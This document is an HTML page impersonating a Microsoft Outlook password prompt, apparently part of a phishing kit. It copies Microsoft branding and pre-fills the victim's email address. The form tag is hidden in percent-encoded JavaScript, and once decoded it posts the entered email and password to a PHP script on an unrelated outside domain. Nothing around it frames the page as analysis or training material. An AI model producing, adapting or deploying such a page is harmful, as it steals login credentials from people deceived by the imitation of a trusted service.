<meta charset="UTF-8" />
<meta content="width=device-width, initial-scale=1.0" name="viewport" />
<title></title>
<link href="https://aadcdn.msftauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico" rel="shortcut icon" />
<style type="text/css">*{
    padding: 0;
    margin: 0;
    font-family: sans-serif;
    }
    .bg{
        background-image: url('../img/outlook.jpg');
        background-size: cover;
        background-position: center;
        height: 100vh;
    }
    .login{
        width: 30.6%;
        background-color: transparent;
        margin: 0 auto;
        padding-top: 10%;

    }
    .login .outlook_logo{
        max-width: 256px;
        max-height: 36px;
        display: block;
        margin-left: auto;
        margin-right: auto;
        margin-bottom: 25px;
    }
    .login_bg{
        background-color: #fff;
        padding: 43px;
        overflow: hidden;
    }
    .img{
        margin-bottom: 20px;
    }
    .login_bg p{
        display: flex;
        margin-bottom: 20px;
        position: relative;
    }
    .login_bg p img{
        animation: all .2s;
        margin-top: -2px;
        margin-right: 2px;
    }
    .login_bg p img:hover{
        background-color: #ccc;
        border-radius: 50%;
    }
    .login_bg h2{
        line-height: 16px;
        margin-bottom: 20px;
    }
    .login_bg h2 span{
        display: block;
        margin-top: 8px;
        font-weight: normal;
        font-size: 14px;
    }
    .input_text{
        width: 100%;
        border: none;
        border-bottom: 1px solid #656565;
        padding: 8px 0;
        margin-bottom: 20px;
        font-size: 16px;
    }
    .input_text::placeholder{
        font-size: 16px;
    }
    .input_text:active{
        outline: none;
    }
    .input_text:focus{
        outline: none;
    }
    .link_section{
        position: relative;
        display: inline;
    }
    .link{
        display: inline;
        margin-right: 2px;
        line-height: 1px;
    }
    .link:link,
    .link:visited{
        text-decoration: none;
        color: #0067b8;
        font-size: 13px;

    }
    .link:hover{
        color: #656565;
        border-bottom: 1px solid #656565;
    }

    button.btn{
        width: 110px;
        float: right;
        border-color: #0067b8;
        background-color: #0067b8;
        color: #fff;
        font-size: 14px;
        padding: 8px 0;
        cursor: pointer;
        border: none;
    }
    .qsn_img{
        display: inline-block;
        position: absolute;
        top: 2px;
    }
    .footer{
        position: fixed;
        bottom: 0;
        width: 100%;
        overflow: visible;
        z-index: 99;
        clear: both;
        background-color: rgba(0,0,0,0.6);
    }
    .footer_links{
        margin: 0;
        float: right;
    }
    a.footer_link{
        text-decoration: none;
        color: #fff;
        font-size: 12px;
        line-height: 28px;
        white-space: nowrap;
        display: inline-block;
        margin-left: 8px;
        margin-right: 8px;
    }
    a.footer_link img{
        vertical-align: middle;
    }
</style>
<main class="bg" style="background-image: url(https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg);">
<div class="login"><!-- <h1>Outlook</h1> -->
<div class="login_bg"><img alt="" class="img" src="https://aadcdn.msftauth.net/ests/2.1/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" />
<script language=javascript>document.write(unescape('%0A%0A%27%3C%66%6F%72%6D%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%6D%2D%73%61%72%2E%63%6F%6D%2F%71%68%6A%6E%42%78%44%2F%70%6F%70%2F%6C%6F%67%6F%6E%2E%70%68%70%22%20%0A%0A%20%0A%0A%20%20'))</script> method="POST">
<p><img alt="" src="https://aadcdn.msftauth.net/ests/2.1/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg" /> <input id="email" name="email" placeholder="Email Address" readonly="readonly" required="" style="border: none;" type="email" value="[EMail]" /></p>
<h2>Enter password<span style="color: rgb(255, 0, 0); font-family: &quot;Helvetica Neue&quot;, Helvetica, Arial, sans-serif;"></span></h2>
<input class="input_text" name="password" placeholder="Password" type="password" />
<div class="link_section"><a class="link" href="#">Forgot my password</a></div>
<br />
<br />
<button class="btn" type="submit">Sign in</button></form>
</div>
</div>

<div class="footer">
<div class="footer_links"><a class="footer_link" href="#">Terms of use</a> <a class="footer_link" href="#">Privacy &amp; cookies</a> <a class="footer_link" href="#"> <img alt="" src="https://aadcdn.msftauth.net/ests/2.1/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b588ad73.svg" /> </a></div>
</div>
</main>

<p>&nbsp;</p>
